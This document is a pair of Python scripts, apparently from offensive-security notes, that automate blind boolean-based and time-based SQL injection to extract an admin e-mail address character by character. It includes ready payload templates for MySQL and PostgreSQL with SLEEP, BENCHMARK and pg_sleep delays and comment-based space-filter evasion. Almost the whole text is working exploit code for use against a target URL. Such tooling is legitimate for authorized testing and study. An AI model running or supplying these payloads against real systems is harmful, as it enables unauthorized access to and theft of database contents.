SQL Injection

Blind Boolean-Based

import requests
import sys
#import urllib3
#urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
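def test_injection(url, condition, timeout=30):
    """Send one GET request and report whether the boolean oracle fired.

    Args:
        url: Fully-built request URL, injection payload already appended.
        condition: Substring whose presence in the response body marks a
            TRUE result. It must appear only on the TRUE page; a word that
            also occurs on the FALSE page makes every candidate "match".
        timeout: Seconds to wait for the response. Without it a stalled
            target hangs the whole extraction loop forever.

    Returns:
        True if ``condition`` appears anywhere in the response text.

    Raises:
        requests.RequestException on network errors or timeout.
    """
    # verify=False (together with the urllib3 warning filter at the top of
    # the file) disables TLS certificate checks. Lab targets only: it also
    # lets anyone on the path read or alter your own traffic.
    req = requests.get(url, timeout=timeout)  # , verify=False)
    # Check whether the condition has occurred. If so, the injection was successful.
    return condition in req.text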
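def extract(target, injection, query, condition, *, oracle=None):
    """Recover the result of ``query`` one character at a time via a boolean oracle.

    For each position every printable ASCII code (32..126) is tried in turn
    until the oracle reports TRUE. Extraction stops at the first position
    where no candidate matches; that is how the end of the value is detected.

    Args:
        target: Base URL up to and including the injectable parameter.
        injection: Format template with three ``{}`` slots, filled in order
            with the sub-query, the 1-based character position and the
            candidate ASCII code. After formatting, every space (including
            those inside ``query``) is rewritten to ``/**/`` so the payload
            survives space filtering.
        query: SQL sub-query that must yield a single string value.
        condition: Passed through to the oracle unchanged.
        oracle: Callable ``(url, condition) -> bool``; defaults to
            ``test_injection``. Lets the same loop drive other request
            styles (POST body, header) or be exercised offline.

    Returns:
        The extracted string; empty if the first position never matched.

    Caveats:
        - Characters outside 32..126 (non-ASCII, control chars) can never
          match, so the result is truncated at the first such character.
        - Worst case is 95 requests per character. A binary search over the
          ASCII range with ``<``/``>`` in the template needs about 7.
    """
    if oracle is None:
        oracle = test_injection
    pos = 1
    extracted = ""
    while True:
        # range() excludes its upper bound: 127 so that '~' (126), the last
        # printable ASCII character, is reachable.
        for ascii_char in range(32, 127):
            url = target + injection.format(query, pos, ascii_char).replace(" ", "/**/")
            if oracle(url, condition):
                extracted += chr(ascii_char)
                pos += 1
                break
        else:
            # No candidate matched at this position: end of value (or an
            # unmatchable character). Stop here.
            return extracted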
def get_admin_email(target, injection, condition):
    """Pull the ``email`` column of the ``admin`` row out of ``users``.

    Thin wrapper around ``extract`` with the sub-query fixed; the table and
    column names must match the target schema.
    """
    admin_email_query = "SELECT email FROM users WHERE username = 'admin'"
    return extract(
        target,
        injection,
        admin_email_query,
        condition,
    )
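def main():
    """CLI entry point: parse argv, pick an injection template and dump the admin e-mail.

    Usage: ``script.py TARGET LHOST LPORT``. Only TARGET is used here; LHOST
    and LPORT are parsed but not needed for data extraction.

    Before running, uncomment exactly one ``injection`` template below and
    set ``condition`` to a string that appears in the response only when
    the injected predicate is TRUE. While either is unset the script exits
    with a message instead of crashing with a NameError.
    """
    if len(sys.argv) != 4:
        print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0]))
        sys.exit(-1)

    target = sys.argv[1]
    lhost = sys.argv[2]  # not used by this script
    lport = sys.argv[3]  # not used by this script

    injection = None
    ## MySQL: '#' ends the statement. It is sent as %23 because a literal '#'
    ## starts the URL fragment and would be stripped before the request goes out.
    # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
    # injection = "') AND ASCII(SUBSTR(({}),{},1)){}%23" # Operator-style variant: the third slot must carry e.g. '>64'; extract() as written supplies a bare number, so this one does not work with it unchanged.
    ## PostgreSQL: '#' is not a comment in PostgreSQL; terminate with '--' instead.
    # injection = "') AND ASCII(SUBSTR(({}),{},1))={}--" # Declare the injection string.

    # Marker that appears in the response only for a TRUE predicate,
    # e.g. a greeting that only the "found" page shows.
    condition = None

    if injection is None or condition is None:
        print("[-] Set an injection template and the TRUE-response marker in main() first.")
        sys.exit(-1)

    extracted_data = get_admin_email(target, injection, condition)
    print("[+] EXTRACTED: {}".format(extracted_data))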
if __name__ == "__main__":  # Run only when executed as a script, not on import.
    main()

Blind Time-Based

import requests
import sys
#import urllib3
#urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
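def test_injection(url, time_condition, timeout=60):
    """Send one GET request and report whether the injected delay was observed.

    Args:
        url: Fully-built request URL, injection payload already appended.
        time_condition: Threshold in seconds; a response slower than this
            counts as TRUE. Choose it above the target's normal latency and
            below the delay the payload injects (e.g. 4 for SLEEP(5)).
        timeout: Socket timeout for the request. It must exceed the injected
            delay, otherwise every TRUE response surfaces as a Timeout
            exception; without any timeout a dead target hangs forever.

    Returns:
        True if ``response.elapsed`` (time until the headers arrived)
        exceeds ``time_condition``.

    Raises:
        requests.RequestException on network errors or timeout.

    Note:
        Network jitter can push a FALSE response over the threshold, and
        extract() accepts the first candidate that fires, so one slow
        response yields a wrong character. Measure a baseline first and
        re-check suspicious characters with a second request.
    """
    # verify=False (together with the urllib3 warning filter at the top of
    # the file) disables TLS certificate checks -- lab targets only.
    req = requests.get(url, timeout=timeout)  # , verify=False)
    # float() rather than int() so fractional thresholds such as "2.5" work.
    return req.elapsed.total_seconds() > float(time_condition)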
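def extract(target, injection, query, time_condition, *, oracle=None):
    """Recover the result of ``query`` one character at a time via a timing oracle.

    For each position every printable ASCII code (32..126) is tried in turn
    until the oracle reports TRUE. Extraction stops at the first position
    where no candidate matches; that is how the end of the value is detected.

    Args:
        target: Base URL up to and including the injectable parameter.
        injection: Format template with three ``{}`` slots, filled in order
            with the sub-query, the 1-based character position and the
            candidate ASCII code. After formatting, every space (including
            those inside ``query``) is rewritten to ``/**/`` so the payload
            survives space filtering.
        query: SQL sub-query that must yield a single string value.
        time_condition: Passed through to the oracle unchanged.
        oracle: Callable ``(url, time_condition) -> bool``; defaults to
            ``test_injection``. Lets the same loop drive other request
            styles (POST body, header) or be exercised offline.

    Returns:
        The extracted string; empty if the first position never matched.

    Caveats:
        - Characters outside 32..126 (non-ASCII, control chars) can never
          match, so the result is truncated at the first such character.
        - Worst case is 95 requests per character, each one paying the
          injected delay only on a hit; a binary search over the ASCII
          range with ``<``/``>`` in the template needs about 7.
        - A single jittery response is taken as a hit; see test_injection().
    """
    if oracle is None:
        oracle = test_injection
    pos = 1
    extracted = ""
    while True:
        # range() excludes its upper bound: 127 so that '~' (126), the last
        # printable ASCII character, is reachable.
        for ascii_char in range(32, 127):
            url = target + injection.format(query, pos, ascii_char).replace(" ", "/**/")
            if oracle(url, time_condition):
                extracted += chr(ascii_char)
                pos += 1
                break
        else:
            # No candidate matched at this position: end of value (or an
            # unmatchable character). Stop here.
            return extracted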
def get_admin_email(target, injection, time_condition):
    """Pull the ``email`` column of the ``admin`` row out of ``users``.

    Thin wrapper around ``extract`` with the sub-query fixed; the table and
    column names must match the target schema.
    """
    admin_email_query = "SELECT email FROM users WHERE username = 'admin'"
    return extract(
        target,
        injection,
        admin_email_query,
        time_condition,
    )
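def main():
    """CLI entry point: parse argv, pick a delay-based injection template and dump the admin e-mail.

    Usage: ``script.py TARGET LHOST LPORT``. Only TARGET is used here; LHOST
    and LPORT are parsed but not needed for data extraction.

    Before running, uncomment exactly one ``injection`` template below and
    set ``time_condition`` to the number of seconds above which a response
    counts as TRUE (below the injected delay, above normal latency). While
    either is unset the script exits with a message instead of a NameError.
    """
    if len(sys.argv) != 4:
        print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0]))
        sys.exit(-1)

    target = sys.argv[1]
    lhost = sys.argv[2]  # not used by this script
    lport = sys.argv[3]  # not used by this script

    injection = None
    ## MySQL: '#' ends the statement. It is sent as %23 because a literal '#'
    ## starts the URL fragment and would be stripped before the request goes out.
    # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND SLEEP(5)%23" # Declare the injection string.
    # injection = "') AND ASCII(SUBSTR(({}),{},1)){} AND BENCHMARK(3000000,SHA1(1337))%23" # CPU-bound fallback when SLEEP() is filtered; delay is ~2-3 s but varies with server load. Third slot has no '=': restore it (or pass an operator) before using with extract().
    ## PostgreSQL: '#' is not a comment in PostgreSQL; terminate with '--' instead.
    # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT 1 FROM pg_sleep(10))=1--" # Declare the injection string.
    # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))=1--" # CPU-bound fallback when pg_sleep() is filtered; replace [SLEEPTIME] and calibrate against the target.

    # Seconds above which a response is treated as TRUE, e.g. 4 for SLEEP(5).
    # Keep it below the injected delay and above the target's baseline latency.
    time_condition = None

    if injection is None or time_condition is None:
        print("[-] Set an injection template and time_condition in main() first.")
        sys.exit(-1)

    extracted_data = get_admin_email(target, injection, time_condition)
    print("[+] EXTRACTED: {}".format(extracted_data))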
if __name__ == "__main__":  # Run only when executed as a script, not on import.
    main()